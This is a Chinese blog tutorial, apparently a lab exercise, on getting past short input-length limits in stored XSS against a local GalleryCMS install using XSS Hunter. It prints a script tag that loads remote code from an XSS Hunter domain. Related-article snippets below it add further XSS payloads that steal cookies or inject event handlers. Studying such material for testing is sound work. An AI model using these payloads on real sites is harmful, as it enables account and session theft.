XSS短字符短域名绕过,XSS相关的知识

最新推荐文章于 2024-04-24 23:55:02 发布
最新推荐文章于 2024-04-24 23:55:02 发布
阅读量1.5k 收藏
点赞数
文章标签: xss 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57581503/article/details/125992379
版权

XSS短字符域名绕过

先在phpstudy上搭建一个gamerycms的一个平台,文件可以在github上获得:https://github.com/bensonarts/GalleryCMS
搭建完成之后我们就有以下的界面
在这里插入图片描述
这将是我们进行xss存储型攻击的目标,当然也需要一个工具这边国内外都有网站,我用的国外的网站,https://xsshunter.com/直接注册,为了之后的方便建议把自定义xss域名设置短一点,然后我们就可以进行尝试绕过了;
先一步把靶机配置好环境,然后我们进到xsshunter中在里边我们能获取到Payloads,这是推荐给我们的语句,是可以直接使用的。
通常情况下,程序员在编写前端的时候,都会限制我们用户输入的字符长度,所以我们要选择最短的一条语句输入;
在这里插入图片描述
这条是最短的(别问我为什么域名这么长,申请不到)

<script>$.getScript("//1122334zmbgxyh233.xss.ht")</script>

之后就前往搭建好的网站上测试
在这里插入图片描述
在里边输入我们复制的最短的语句并Add;

在这里插入图片描述
很明显说输入的长度不能超过45字节,我们输入的超过了45字节,那我们就应该怎么样去减少长度,这时候我们想方设法(上帝模式)去查看网站对输入的标签的过滤规则

最低0.47元/天 解锁文章
是个歌姬
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS测试中如何绕过字符长度限制(续)
NOSEC2019的博客
12-03 1296
在以前的NOSEC文章中,曾发布过一个在20个字符限制下进行XSS攻击(引入外界XSS脚本)的文章(https://nosec.org/home/detail/3206.html)。而本文作者对其中原理进行深入了研究,找到了更多相关payload。 跨站脚本(XSS)是在Web渗透测试中发现的最常见的漏洞之一。但是,根据注入点的位置不同,对攻击字符可能会存在各种限制。而在这篇文章中,将展示利...
XSS知识总结
weixin_64051447的博客
04-26 1682
HTML标签 等带src属性的标签都可以跨域加载资源,而不受同源策略的限制。每次加载时都会由浏览器发送一次GET请求,通过src属性加载的资源,浏览器会限制JavaScript的权限,使其不能读写返回的内容。
【网络安全 / 前端 XSS 防护】一文带你了解 HTML 的特殊字符转义及编码
胡西风的博客
04-01 163
如果用户输入的内容未经过转义或编码处理,并且在个人简介页面上直接显示,那么攻击者可以在自我介绍中插入恶意 HTML 标签或属性。例如,当浏览器检测到页面中的特殊字符被正确转义或编码时,它们会将其视为纯文本,不会将其解析为 HTML 标签或脚本。转义时应考虑多重编码:当字符传输经过多个层级或环节时,确保在每个层级或环节上都进行了正确的编码和转义处理。这样,HTML 标签和属性不再被解析为可执行的代码,保护了页面和用户的安全。这样,URL 中的特殊字符被转义为实体编码,防止了恶意代码的执行。
XSS语句大全
最新发布
ch_ycc的博客
04-24 905
10、t_sort="type="button" onfocus="alert(1) onfocus-当窗口获得焦点时运行脚本。13、Cookies传 user=" onclick="alert(1)" type="text"12、User agent传 "type="button" onclick="alert(1)11、Referer传" type="button" onclick="alert(1)转化为实体字符: javascript:alert('xss')
XSS语句总结
热门推荐
王骕的专栏
03-07 1万+
基础检测,出现弹框:           (显示1)           alert("xss") (显示xss)           alert(document.cookie) (显示cookie)) Cookie类型XSS     1.Xss 安全测试字符转换工具            工具猫             http://tool.dn8.net/# XSS测试平台
xss payload
07-15 379
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
xss特殊字符拦截与过滤
04-01
滤除content中的危险 HTML 代码, 主要是脚本代码, 滚动字幕代码以及脚本事件处理代码
xss.rar_XSS_xss字符限制
09-24
PSTZine_0x03_0x04--突破XSS字符数量限制执行任意JS代码
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
记录几种XSS绕过方式1
08-03
记录几种XSS绕过方式一.服务端全局替换为空的特性比如某站正则 过滤了onerror 过滤了script 这些 但是“ 或者 ‘ 这这种符号会变成空可以绕过,例
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
XSS平台源代码,最新版本。适合自己部署
03-26
XSS平台源代码,最新版本。适合自己部署,有喜欢信息安全的小伙伴可以一起沟通交流。
xsshunter:XSS Hunter服务-XSSHunter.com的便携式版本
05-03
XSS Hunter源代码 这是在运行的源代码的可移植版本。 它旨在轻松地安装在任何服务器上,以供希望以更强大的方式测试XSS安全专业人员和漏洞赏金猎人使用。 如果您不想设置此软件,而只是开始测试,请参阅 。 要求 运行(最好是)Ubuntu的服务器。 一个帐户,用于发送XSS有效负载启动电子邮件。 域名,最好是简的名称,以减小有效负载大小。 这是一个找到两个字母域名的好网站: : 。 例如,我的域名是 通配符SSL证书,证书。 这是必需的,因为XSS Hunter会根据用户的子域来识别用户,并且他们都需要启用SSL。 我们不能使用“让我们加密”,因为。 我将阻止侮辱CA业务模型,但请放心,这非常愚蠢,并且花费很少的钱为您提供通配符证书,因此请选择可以找到的最便宜的提供商(只要所有浏览器都支持) 。 设置 有关如何在自己的服务器上设置XSS Hunter的信息,请参阅 。
xss
weixin_46729085的博客
09-26 342
1.xss概念和分类 1.1 什么是xss漏洞 举列: 1.2xss分类 2.存储xss分析 特点:相关数据会在服务器中存储 例如: 1.1攻击方:通过网页注入javascript脚本,代码被浏览器执行,该类型有持久化特点(存储数据库或者物理文件) alert(打印信息); 点击留言按钮 1.2.cookie 原网站: 管理员:登陆 (登录成功后,执行的攻击方的代码)alert(打印信息); ...
【无标题】xss域名绕过字符长度限制以及执行弹窗的原理
m0_52813136的博客
07-26 628
XSS域名绕过及弹窗的原理
XSS 攻击常用代码
高压锅博客
12-22 7130
【代码】XSS 攻击常用代码。
XSS小技巧
积累,在于坚持
01-20 956
1、在DOM Based XSS时,可以使用//来注释不需要的符号 2、通过\转义双引号,当返回页面为GBK/GB2312时,“%cl\”两个字符组合在一起,会成为一个Unicode字符。可利用此编码规则进行XSS攻击 3、有些产生XSS的地方有变量长度的限制,可以用以下方式绕过: 利用事件把XSS Payload写到别处,再通过简的代码加载这段payload(最常用的是将代码放在
XSS绕过长度限制的两个Tips
Exploit的小站~
09-13 6851
0x00 使用outerHTML<img src onerror=outerHTML=URL>利用了outerHTML和URL(这里的URL是document.URL),将要执行的JS放在url中,从而突破长度限制。使用document.URL构造XSS执行JS。 实例:<?php echo "keywords is:" . substr($_GET['k'], 0, 35); ?>提交URL:h
xss 空格过滤绕过
07-27
XSS(跨站脚本攻击)是一种...重要的是要意识到,绕过空格过滤只是XSS攻击的一种方式,还有其他许多方法可以进行XSS攻击。为了保护网站免受XSS攻击,建议采取综合的安全措施,包括输入验证、输出编码、内容安全策略等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值